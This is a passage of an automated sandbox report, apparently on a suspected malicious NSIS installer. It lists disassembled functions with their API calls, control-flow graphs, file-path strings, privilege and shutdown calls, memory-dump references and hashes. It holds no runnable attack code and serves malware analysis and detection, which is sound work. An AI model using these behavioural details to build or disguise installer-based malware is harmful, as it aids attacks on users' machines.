                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403884
                                                                      • ExitProcess.KERNEL32 ref: 004038A7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                      • String ID: "C:\Users\user\Desktop\yVVZdG2NJX.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\yVVZdG2NJX.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                      • API String ID: 3441113951-2980922028
                                                                      • Opcode ID: d8beda2cf6d53e1c23663c7b3f0cac31a10eecbcac031cdf32090e7074c6eb08
                                                                      • Instruction ID: 91e47d7dade8a9784fbcad93861d46a8301334ec9f5f2e607ded2091cc9dec5c
                                                                      • Opcode Fuzzy Hash: d8beda2cf6d53e1c23663c7b3f0cac31a10eecbcac031cdf32090e7074c6eb08
                                                                      • Instruction Fuzzy Hash: 04D12671600300ABD720BF719D45B2B3AACEB8174AF00887FF981B62D1DB7D8955876E
                                                                      Function 00404C7B Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 139 404c7b-404cc7 GetDlgItem * 2 140 404ee8-404eef 139->140 141 404ccd-404d61 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 139->141 142 404ef1-404f01 140->142 143 404f03 140->143 144 404d70-404d77 DeleteObject 141->144 145 404d63-404d6e SendMessageW 141->145 146 404f06-404f0f 142->146 143->146 147 404d79-404d81 144->147 145->144 148 404f11-404f14 146->148 149 404f1a-404f20 146->149 150 404d83-404d86 147->150 151 404daa-404dae 147->151 148->149 153 404ffe-405005 148->153 156 404f22-404f29 149->156 157 404f2f-404f36 149->157 154 404d88 150->154 155 404d8b-404da8 call 4062b9 SendMessageW * 2 150->155 151->147 152 404db0-404ddc call 40420e * 2 151->152 195 404de2-404de8 152->195 196 404ea7-404eba GetWindowLongW SetWindowLongW 152->196 159 405076-40507e 153->159 160 405007-40500d 153->160 154->155 155->151 156->153 156->157 162 404f38-404f3b 157->162 163 404fab-404fae 157->163 170 405080-405086 SendMessageW 159->170 171 405088-40508f 159->171 167 405013-40501d 160->167 168 40525e-405270 call 404275 160->168 164 404f46-404f5b call 404bc9 162->164 165 404f3d-404f44 162->165 163->153 169 404fb0-404fba 163->169 164->163 194 404f5d-404f6e 164->194 165->163 165->164 167->168 177 405023-405032 SendMessageW 167->177 179 404fca-404fd4 169->179 180 404fbc-404fc8 SendMessageW 169->180 170->171 173 405091-405098 171->173 174 4050c3-4050ca 171->174 182 4050a1-4050a8 173->182 183 40509a-40509b ImageList_Destroy 173->183 186 405220-405227 174->186 187 4050d0-4050dc call 4011ef 174->187 177->168 188 405038-405049 SendMessageW 177->188 179->153 181 404fd6-404fe0 179->181 180->179 190 404ff1-404ffb 181->190 191 404fe2-404fef 181->191 192 4050b1-4050bd 182->192 193 4050aa-4050ab GlobalFree 182->193 183->182 186->168 200 405229-405230 186->200 213 4050ec-4050ef 187->213 214 4050de-4050e1 187->214 198 405053-405055 188->198 199 40504b-405051 188->199 190->153 191->153 192->174 193->192 194->163 202 404f70-404f72 194->202 203 404deb-404df2 195->203 201 404ec0-404ec4 196->201 205 405056-40506f call 401299 SendMessageW 198->205 199->198 199->205 200->168 206 405232-40525c ShowWindow GetDlgItem ShowWindow 200->206 207 404ec6-404ed9 ShowWindow call 404243 201->207 208 404ede-404ee6 call 404243 201->208 209 404f74-404f7b 202->209 210 404f85 202->210 211 404e88-404e9b 203->211 212 404df8-404e20 203->212 205->159 206->168 207->168 208->140 218 404f81-404f83 209->218 219 404f7d-404f7f 209->219 222 404f88-404fa4 call 40117d 210->222 211->203 226 404ea1-404ea5 211->226 220 404e22-404e58 SendMessageW 212->220 221 404e5a-404e5c 212->221 227 405130-405154 call 4011ef 213->227 228 4050f1-40510a call 4012e2 call 401299 213->228 223 4050e3 214->223 224 4050e4-4050e7 call 404c49 214->224 218->222 219->222 220->211 233 404e5e-404e6d SendMessageW 221->233 234 404e6f-404e85 SendMessageW 221->234 222->163 223->224 224->213 226->196 226->201 241 4051f6-40520a InvalidateRect 227->241 242 40515a 227->242 246 40511a-405129 SendMessageW 228->246 247 40510c-405112 228->247 233->211 234->211 241->186 244 40520c-40521b call 404b9c call 404b84 241->244 245 40515d-405168 242->245 244->186 248 40516a-405179 245->248 249 4051de-4051f0 245->249 246->227 251 405114 247->251 252 405115-405118 247->252 254 40517b-405188 248->254 255 40518c-40518f 248->255 249->241 249->245 251->252 252->246 252->247 254->255 256 405191-405194 255->256 257 405196-40519f 255->257 259 4051a4-4051dc SendMessageW * 2 256->259 257->259 260 4051a1 257->260 259->249 260->259
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404C93
                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404C9E
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CE8
                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404CFB
                                                                      • SetWindowLongW.USER32(?,000000FC,00405273), ref: 00404D14
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D28
                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D3A
                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404D50
                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D5C
                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D6E
                                                                      • DeleteObject.GDI32(00000000), ref: 00404D71
                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D9C
                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DA8
                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E3E
                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E69
                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E7D
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404EAC
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EBA
                                                                      • ShowWindow.USER32(?,00000005), ref: 00404ECB
                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FC8
                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040502D
                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405042
                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405066
                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405086
                                                                      • ImageList_Destroy.COMCTL32(?), ref: 0040509B
                                                                      • GlobalFree.KERNEL32(?), ref: 004050AB
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405124
                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 004051CD
                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051DC
                                                                      • InvalidateRect.USER32(?,00000000,?), ref: 004051FC
                                                                      • ShowWindow.USER32(?,00000000), ref: 0040524A
                                                                      • GetDlgItem.USER32(?,000003FE), ref: 00405255
                                                                      • ShowWindow.USER32(00000000), ref: 0040525C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                      • String ID: $M$N
                                                                      • API String ID: 1638840714-813528018
                                                                      • Opcode ID: 7bba4bc50886af6ee4f9e8a9478083b1cbee84b53dc979653cd125d1348ee930
                                                                      • Instruction ID: 9d148378a915bf423124f05431c6d1c5c5454a8af56f3bee09cc42272145c63f
                                                                      • Opcode Fuzzy Hash: 7bba4bc50886af6ee4f9e8a9478083b1cbee84b53dc979653cd125d1348ee930
                                                                      • Instruction Fuzzy Hash: 59026EB0900209EFEB109F54DD85AAE7BB9FB85314F10817AF610BA2E1D7799E41CF58
                                                                      Function 703D1B63 Relevance: 20.1, APIs: 13, Instructions: 576stringlibrarymemoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 703D121B: GlobalAlloc.KERNELBASE(00000040,?,703D123B,?,703D12DF,00000019,703D11BE,-000000A0), ref: 703D1225
                                                                      • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 703D1C6F
                                                                      • lstrcpyW.KERNEL32(00000008,?), ref: 703D1CB7
                                                                      • lstrcpyW.KERNEL32(00000808,?), ref: 703D1CC1
                                                                      • GlobalFree.KERNEL32(00000000), ref: 703D1CD4
                                                                      • GlobalFree.KERNEL32(?), ref: 703D1DB6
                                                                      • GlobalFree.KERNEL32(?), ref: 703D1DBB
                                                                      • GlobalFree.KERNEL32(?), ref: 703D1DC0
                                                                      • GlobalFree.KERNEL32(00000000), ref: 703D1FAA
                                                                      • lstrcpyW.KERNEL32(?,?), ref: 703D2144
                                                                      • GetModuleHandleW.KERNEL32(00000008), ref: 703D21B9
                                                                      • LoadLibraryW.KERNEL32(00000008), ref: 703D21CA
                                                                      • GetProcAddress.KERNEL32(?,?), ref: 703D2224
                                                                      • lstrlenW.KERNEL32(00000808), ref: 703D223E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1598887120.00000000703D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 703D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1598873256.00000000703D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1598903143.00000000703D3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1598921247.00000000703D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_703d0000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                      • String ID:
                                                                      • API String ID: 245916457-0
                                                                      • Opcode ID: 3bc7046d160a1825fcaf16214784d309b50f81b51c92c3d8197b0be18138dc56
                                                                      • Instruction ID: be9ddf896ad3e724a758fe26ae4a600768dda62136bcd8fe7b79d691b523d28f
                                                                      • Opcode Fuzzy Hash: 3bc7046d160a1825fcaf16214784d309b50f81b51c92c3d8197b0be18138dc56
                                                                      • Instruction Fuzzy Hash: 48226C73D14209EFCB128FB4C980AAEB7B9FB04315F21452EE196E7380D7749A85DB50
                                                                      Function 004059A9 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 719 4059a9-4059cf call 405c74 722 4059d1-4059e3 DeleteFileW 719->722 723 4059e8-4059ef 719->723 724 405b65-405b69 722->724 725 4059f1-4059f3 723->725 726 405a02-405a12 call 406297 723->726 727 405b13-405b18 725->727 728 4059f9-4059fc 725->728 734 405a21-405a22 call 405bb8 726->734 735 405a14-405a1f lstrcatW 726->735 727->724 730 405b1a-405b1d 727->730 728->726 728->727 732 405b27-405b2f call 4065da 730->732 733 405b1f-405b25 730->733 732->724 743 405b31-405b45 call 405b6c call 405961 732->743 733->724 736 405a27-405a2b 734->736 735->736 739 405a37-405a3d lstrcatW 736->739 740 405a2d-405a35 736->740 742 405a42-405a5e lstrlenW FindFirstFileW 739->742 740->739 740->742 744 405a64-405a6c 742->744 745 405b08-405b0c 742->745 759 405b47-405b4a 743->759 760 405b5d-405b60 call 4052ff 743->760 748 405a8c-405aa0 call 406297 744->748 749 405a6e-405a76 744->749 745->727 747 405b0e 745->747 747->727 761 405aa2-405aaa 748->761 762 405ab7-405ac2 call 405961 748->762 751 405a78-405a80 749->751 752 405aeb-405afb FindNextFileW 749->752 751->748 755 405a82-405a8a 751->755 752->744 758 405b01-405b02 FindClose 752->758 755->748 755->752 758->745 759->733 765 405b4c-405b5b call 4052ff call 40605d 759->765 760->724 761->752 766 405aac-405ab5 call 4059a9 761->766 771 405ae3-405ae6 call 4052ff 762->771 772 405ac4-405ac7 762->772 765->724 766->752 771->752 775 405ac9-405ad9 call 4052ff call 40605d 772->775 776 405adb-405ae1 772->776 775->752 776->752
                                                                      APIs
                                                                      • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 004059D2
                                                                      • lstrcatW.KERNEL32(007A3F28,\*.*,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 00405A1A
                                                                      • lstrcatW.KERNEL32(?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 00405A3D
                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 00405A43
                                                                      • FindFirstFileW.KERNEL32(007A3F28,?,?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 00405A53
                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AF3
                                                                      • FindClose.KERNEL32(00000000), ref: 00405B02
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                      • String ID: "C:\Users\user\Desktop\yVVZdG2NJX.exe"$(?z$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                      • API String ID: 2035342205-163191563
                                                                      • Opcode ID: 4d5656c0894c7074968c07a7ddfc43275556ff456bdda599b280e6413b0d544d
                                                                      • Instruction ID: 8b5db7531a0f4bb83586dba503ceccc8cbbd7972abfd892cd346515476ce1415
                                                                      • Opcode Fuzzy Hash: 4d5656c0894c7074968c07a7ddfc43275556ff456bdda599b280e6413b0d544d
                                                                      • Instruction Fuzzy Hash: 7D41D830900918A6CF21AB65CC89ABF7678EF82718F14827FF801B11C1D77C5985DE6E
                                                                      Function 004065DA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1077 4065da-4065ee FindFirstFileW 1078 4065f0-4065f9 FindClose 1077->1078 1079 4065fb 1077->1079 1080 4065fd-4065fe 1078->1080 1079->1080
                                                                      APIs
                                                                      • FindFirstFileW.KERNELBASE(?,007A4F70,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,00405CBD,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,?,?,774D3420,004059C9,?,C:\Users\user\AppData\Local\Temp\,774D3420), ref: 004065E5
                                                                      • FindClose.KERNEL32(00000000), ref: 004065F1
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\nsg9061.tmp, xrefs: 004065DA
                                                                      • pOz, xrefs: 004065DB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFileFirst
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsg9061.tmp$pOz
                                                                      • API String ID: 2295610775-3911491118
                                                                      • Opcode ID: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                                                      • Instruction ID: b37c022bec08382a0cb03c9db181d2efdea8b1f21deeb05207148622359d6313
                                                                      • Opcode Fuzzy Hash: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                                                      • Instruction Fuzzy Hash: EFD01231519020AFC2001B38BD0C84B7A589F463307158B3AB4A6F11E4CB788C6296A9
                                                                      Function 00404243 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(00000028,?,?,0040406E), ref: 00404251
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
                                                                      • Instruction ID: 5dee82f2d739acac93035fb571c052082ac1606baee7bb158d490297d0aa81d3
                                                                      • Opcode Fuzzy Hash: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
                                                                      • Instruction Fuzzy Hash: 99B09236190A00AADE614B40DE49F457A62A7A8701F00C029B240640B0CAB200A0DB09
                                                                      Function 00403D35 Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 261 403d35-403d47 262 403e88-403e97 261->262 263 403d4d-403d53 261->263 264 403ee6-403efb 262->264 265 403e99-403ee1 GetDlgItem * 2 call 40420e SetClassLongW call 40140b 262->265 263->262 266 403d59-403d62 263->266 268 403f3b-403f40 call 40425a 264->268 269 403efd-403f00 264->269 265->264 270 403d64-403d71 SetWindowPos 266->270 271 403d77-403d7a 266->271 283 403f45-403f60 268->283 275 403f02-403f0d call 401389 269->275 276 403f33-403f35 269->276 270->271 272 403d94-403d9a 271->272 273 403d7c-403d8e ShowWindow 271->273 278 403db6-403db9 272->278 279 403d9c-403db1 DestroyWindow 272->279 273->272 275->276 298 403f0f-403f2e SendMessageW 275->298 276->268 282 4041db 276->282 287 403dbb-403dc7 SetWindowLongW 278->287 288 403dcc-403dd2 278->288 284 4041b8-4041be 279->284 286 4041dd-4041e4 282->286 290 403f62-403f64 call 40140b 283->290 291 403f69-403f6f 283->291 284->282 293 4041c0-4041c6 284->293 287->286 296 403e75-403e83 call 404275 288->296 297 403dd8-403de9 GetDlgItem 288->297 290->291 294 403f75-403f80 291->294 295 404199-4041b2 DestroyWindow EndDialog 291->295 293->282 299 4041c8-4041d1 ShowWindow 293->299 294->295 300 403f86-403fd3 call 4062b9 call 40420e * 3 GetDlgItem 294->300 295->284 296->286 301 403e08-403e0b 297->301 302 403deb-403e02 SendMessageW IsWindowEnabled 297->302 298->286 299->282 331 403fd5-403fda 300->331 332 403fdd-404019 ShowWindow KiUserCallbackDispatcher call 404230 EnableWindow 300->332 305 403e10-403e13 301->305 306 403e0d-403e0e 301->306 302->282 302->301 310 403e21-403e26 305->310 311 403e15-403e1b 305->311 309 403e3e-403e43 call 4041e7 306->309 309->296 314 403e5c-403e6f SendMessageW 310->314 316 403e28-403e2e 310->316 311->314 315 403e1d-403e1f 311->315 314->296 315->309 317 403e30-403e36 call 40140b 316->317 318 403e45-403e4e call 40140b 316->318 327 403e3c 317->327 318->296 328 403e50-403e5a 318->328 327->309 328->327 331->332 335 40401b-40401c 332->335 336 40401e 332->336 337 404020-40404e GetSystemMenu EnableMenuItem SendMessageW 335->337 336->337 338 404050-404061 SendMessageW 337->338 339 404063 337->339 340 404069-4040a8 call 404243 call 403d16 call 406297 lstrlenW call 4062b9 SetWindowTextW call 401389 338->340 339->340 340->283 351 4040ae-4040b0 340->351 351->283 352 4040b6-4040ba 351->352 353 4040d9-4040ed DestroyWindow 352->353 354 4040bc-4040c2 352->354 353->284 356 4040f3-404120 CreateDialogParamW 353->356 354->282 355 4040c8-4040ce 354->355 355->283 357 4040d4 355->357 356->284 358 404126-40417d call 40420e GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 356->358 357->282 358->282 363 40417f-404197 ShowWindow call 40425a 358->363 363->284
                                                                      APIs
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D71
                                                                      • ShowWindow.USER32(?), ref: 00403D8E
                                                                      • DestroyWindow.USER32 ref: 00403DA2
                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DBE
                                                                      • GetDlgItem.USER32(?,?), ref: 00403DDF
